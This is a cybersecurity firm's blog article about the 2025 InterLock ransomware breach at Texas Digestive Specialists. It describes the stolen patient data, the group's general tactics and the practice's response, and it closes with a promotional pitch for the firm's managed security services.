Texas Digestive Specialists Hit by Major InterLock Ransomware Attack

The healthcare sector continues to face relentless cyberattacks, with the latest victim being Texas Digestive Specialists, a prominent gastroenterology practice serving the Rio Grande Valley. In late May 2025, the InterLock ransomware group successfully infiltrated the organization’s network, potentially compromising the sensitive personal and medical information of 41,521 patients. This attack serves as yet another stark reminder of how cybercriminals specifically target healthcare organizations, knowing that patient care dependencies often pressure victims into paying ransoms quickly.

 What Happened in the Texas Digestive Specialists Breach

Texas Digestive Specialists, formerly known as Gastroenterology Consultants of South Texas, operates multiple facilities across Harlingen, Brownsville, and McAllen, providing comprehensive gastroenterology services to patients throughout South Texas. In late May 2025, this trusted healthcare provider became the victim of a sophisticated cyberattack that would compromise the sensitive information of over 41,000 patients.

• Initial Compromise: The InterLock ransomware group gained unauthorized access to the practice’s network systems, bypassing existing security measures through advanced social engineering techniques
• Double-Extortion Strategy: The cybercriminals employed a two-pronged attack approach, first exfiltrating massive amounts of patient data before deploying ransomware to encrypt the practice’s systems
• Massive Data Theft:Security researchers confirmed that InterLock stole approximately 263 GB of sensitive information, comprising over 215,000 individual files stored in more than 16,900 folders
• Comprehensive Patient Data Exposure: The stolen information included patient names, Social Security numbers, dates of birth, addresses, medical records, health insurance details, testing dates, relevant medical histories, clinical findings, and detailed pathology reports
• Extended Timeline: The compromised data spanned from August 2023 to early 2025, representing nearly two years of sensitive patient information
• Delayed Discovery: The practice didn’t detect the breach until weeks after the initial compromise, allowing criminals extended access to patient systems and data

This attack demonstrates how quickly sophisticated cybercriminals can penetrate healthcare networks and extract vast amounts of sensitive information before detection, highlighting the critical need for advanced monitoring and rapid response capabilities in medical practice cybersecurity.

 Severity and Scope of the Attack

This breach ranks as a high-severity incident due to both the volume of affected individuals and the extremely sensitive nature of the compromised data. With 41,521 patients potentially impacted, this attack affects a significant portion of the Rio Grande Valley’s population who sought gastroenterology care from the practice.

The severity becomes even more concerning when considering the types of medical information exposed. Gastroenterology records often contain particularly sensitive details about digestive health issues, colorectal procedures, weight management treatments, and other private medical conditions that patients would never want publicly disclosed. The combination of personally identifiable information with detailed protected health information creates a perfect storm for identity theft, medical fraud, and potential blackmail scenarios.

The attack’s scope extends beyond immediate patient data compromise:

• Financial records and insurance information enable sophisticated fraud schemes
• Complete medical histories allow criminals to impersonate patients for prescription fraud
• Detailed pathology reports could be used for targeted harassment or blackmail
• Social Security numbers provide pathways to comprehensive identity theft

 How InterLock Executes Their Attacks

InterLock ransomware group has demonstrated sophisticated attack methodologies that make them particularly dangerous to healthcare organizations. The group typically begins their attacks through drive-by compromise techniques, where they either compromise existing legitimate websites or create convincing phishing domains designed to distribute malicious software disguised as popular application updates.

The group has recently evolved their tactics to include the ClickFix social engineering technique, which tricks victims into executing malicious PowerShell commands by presenting fake error messages or security alerts that appear to require user action to resolve. Once victims copy and paste these malicious commands, InterLock gains initial access to their systems.

After establishing initial access, InterLock deploys a sophisticated arsenal of tools for reconnaissance and lateral movement:

• Custom Remote Access Trojans (RATs) for persistent command and control
• Credential stealing malware including LummaStealer and BerserkStealer
• Keyloggers to capture additional authentication credentials
• PowerShell backdoors for maintaining persistent access
• Azure Storage Explorer and AzCopy tools for data exfiltration to cloud storage

The group demonstrates particular expertise in targeting virtualized environments, with their ransomware specifically designed to encrypt virtual machines across both Windows and Linux operating systems. This approach allows them to cause maximum disruption to modern healthcare IT infrastructures that rely heavily on virtualization technologies.

 The Criminal Organization Behind the Attack

InterLock represents a new generation of sophisticated cybercriminal organizations that have emerged to exploit the growing digital dependencies of healthcare providers and other critical infrastructure sectors. This ransomware group first appeared on the cybercrime scene in September 2024 and has quickly established itself as a formidable threat to organizations across North America and Europe.

• Centralized Operations: Unlike many ransomware groups that operate as Ransomware-as-a-Service (RaaS) operations, InterLock appears to function as a more centralized organization without actively recruiting external affiliates, allowing for tighter operational control
• Opportunistic Targeting: The group demonstrates clear financial motivations, selecting victims based on opportunity rather than specific ideological goals, with a particular focus on organizations likely to pay ransoms quickly due to operational dependencies
• Healthcare Specialization: Federal agencies have identified InterLock’s preference for attacking healthcare and public health sector organizations, recognizing that patient care disruptions create urgent pressure to restore systems rapidly
• Professional Infrastructure: The group maintains sophisticated operations including a dark web data leak site called “Worldwide Secrets Blog” where they publish stolen data from victims who refuse to pay ransoms
• Secure Communication Methods: InterLock provides victims with unique identification codes and directs them to negotiate through secure Tor browser connections, demonstrating advanced understanding of operational security
• Government Recognition: The FBI, CISA, and Department of Health and Human Services have specifically identified InterLock as an active threat to critical infrastructure across multiple sectors

The emergence of groups like InterLock represents an evolution in ransomware operations, where cybercriminals combine technical sophistication with strategic targeting to maximize their success rates against organizations that can least afford extended downtime.

 Who Is at Risk

The Texas Digestive Specialists breach puts multiple groups at significant risk, extending far beyond the immediate patient population. Current and former patients who received care from the practice between August 2023 and early 2025 face the highest risk, as their comprehensive medical and personal information has been completely exposed.

Patients are at risk for several types of malicious activity:

• Medical identity theft where criminals use patient information to obtain fraudulent prescriptions or medical services
• Financial fraud through insurance manipulation and billing scams
• Targeted phishing attacks that leverage knowledge of specific medical conditions or recent procedures
• Blackmail attempts using sensitive gastroenterology findings or weight management information
• Comprehensive identity theft using exposed Social Security numbers and demographic data

Healthcare providers and staff at Texas Digestive Specialists also face risks, as employee information may have been included in the data theft. The practice itself confronts significant regulatory penalties, potential lawsuits, and long-term reputational damage that could impact their ability to maintain patient trust and operational viability.

The broader healthcare community should view this attack as a warning about InterLock’s specific targeting of medical practices. The group’s demonstrated capability to penetrate healthcare networks and their preference for targeting this sector suggests that other medical practices, particularly smaller organizations with limited cybersecurity resources, remain at elevated risk for similar attacks.

 Remediation and Response Measures

Texas Digestive Specialists has implemented multiple response strategies to address the breach and protect affected patients, though the effectiveness of these measures has been limited by significant delays in detection and disclosure. The practice’s response efforts demonstrate both the challenges healthcare organizations face when responding to sophisticated cyberattacks and the critical importance of having incident response plans in place before attacks occur.

• Immediate Investigation: The practice launched a comprehensive investigation with assistance from leading cybersecurity specialists to determine the full scope of the compromise and implement additional security measures
• Multi-Channel Notifications: The organization provided notification to all affected individuals through direct mail, media announcements, and a dedicated website explaining the incident details
• Credit Protection Services: Texas Digestive Specialists offered complimentary credit monitoring and identity theft protection services through TransUnion for all impacted patients
• Regulatory Reporting: The breach was officially disclosed to the Texas Attorney General’s office on July 24, 2025, fulfilling legal notification requirements
• Enhanced Security Implementation: The practice indicated they are implementing additional cybersecurity measures, though specific details about these improvements have not been publicly disclosed
• Patient Support Resources: Affected individuals received guidance on protective actions including credit freezes, insurance monitoring, and fraud reporting procedures

The delayed disclosure timeline raises serious concerns about response effectiveness, as the attack occurred in late May 2025 but patient notifications were not issued until late July 2025, creating a dangerous two-month window where affected individuals were unaware of their exposure and unable to take protective measures.

 How CinchOps Can Help Secure Your Business

As a leading managed services provider specializing in cybersecurity for small and medium-sized businesses, CinchOps understands the unique challenges facing healthcare practices and other organizations targeted by sophisticated ransomware groups like InterLock. Our comprehensive approach to cybersecurity combines advanced threat detection with practical security implementations designed specifically for businesses that need enterprise-level protection without enterprise-level complexity.

CinchOps provides multi-layered defense strategies specifically designed to prevent ransomware attacks before they can compromise your systems:

• Advanced Email Security and Anti-Phishing Protection – Our enterprise-grade email filtering systems block malicious attachments and links before they reach your users, while our comprehensive user training programs teach your staff to recognize and report social engineering attempts like ClickFix attacks
• Endpoint Detection and Response (EDR) – We deploy sophisticated monitoring solutions that detect unusual activity patterns, credential theft attempts, and unauthorized network access in real-time, stopping attacks before they can spread throughout your network
• Network Segmentation and Access Controls – Our team implements proper network architecture to limit lateral movement opportunities, ensuring that even if attackers gain initial access, they cannot easily spread to critical systems containing sensitive patient data
• Regular Security Assessments and Vulnerability Management – We conduct comprehensive security evaluations to identify and remediate potential attack vectors before cybercriminals can exploit them, including assessments of your virtual infrastructure that InterLock specifically targets
• Backup and Disaster Recovery Solutions – Our robust backup strategies ensure that your critical data remains accessible even during a ransomware attack, reducing the pressure to pay ransom demands while maintaining operational continuity
• 24/7 Security Monitoring and Incident Response – Our security operations center provides around-the-clock monitoring for threats, with immediate response capabilities to contain and neutralize attacks before they can cause significant damage

Don’t wait until your organization becomes the next victim of a sophisticated ransomware attack. Contact CinchOps today to schedule a comprehensive security assessment and learn how our managed cybersecurity services can protect your business from threats like InterLock ransomware while ensuring you can focus on serving your customers rather than worrying about cybersecurity threats.

 Discover More 

Discover more about our enterprise-grade and business protecting cybersecurity services: CinchOps Cybersecurity
Discover related topics: Interlock Ransomware: New Threat Targeting Critical Infrastructure
For Additional Information on this topic: Texas Gastroenterology Clinic Falls Victim to Interlock Ransomware Attack

FREE CYBERSECURITY ASSESSMENT